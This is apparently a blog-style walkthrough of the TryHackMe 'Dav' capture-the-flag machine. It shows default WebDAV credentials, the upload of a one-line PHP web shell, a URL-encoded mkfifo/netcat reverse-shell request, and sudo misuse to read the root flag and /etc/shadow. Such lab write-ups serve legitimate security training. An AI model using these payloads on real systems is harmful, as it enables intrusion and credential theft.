boot2root machine for FIT and bsides guatemala CTF

This is Dav from THM. This one is ranked as easy and doesn’t give much in the way of hints as to what it’s about.


HTTP only; makes it simple.


Running a basic gobuster turns up a single page: /webdav. This has basic authentication turned on; let’s try some default credentials: wampp:xampp - success! We find some more credentials:


But I can’t crack the hash, and at this stage I don’t have anywhere to use it anyway. What else can we do? I’ve never done webdav before.

This blog gives some instructions; essentially we can use a command line tool called cadaver to connect and it provides a connection somewhat like FTP or SMB.

root@kali:/opt/tryhackme/dav# cadaver 
dav:!> open
Authentication required for webdav on server `':
Username: wampp
dav:/webdav/> id
Unrecognised command. Type 'help' for a list of commands.
dav:/webdav/> help
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        passwd.dav                            44  Aug 25  2019


Using this interface I upload some PHP code to a file called cmd.php

<?php system($_GET[‘cmd’]);?>

From there, I can issue a shell command with Burp Repeater:

GET /webdav/cmd.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f HTTP/1.1


I run linpeas; we can run cat as root. From there we get the root flag and can also read the shadow file if we want:

www-data@ubuntu:/dev/shm$ sudo -u root /bin/cat /root/root.txt
sudo -u root /bin/cat /root/root.txt
www-data@ubuntu:/dev/shm$ sudo -u root /bin/cat /etc/shadow
sudo -u root /bin/cat /etc/shadow
www-data@ubuntu:/dev/shm$ root@kali:/opt/tryhackme/dav# 

So that was pretty straightforward.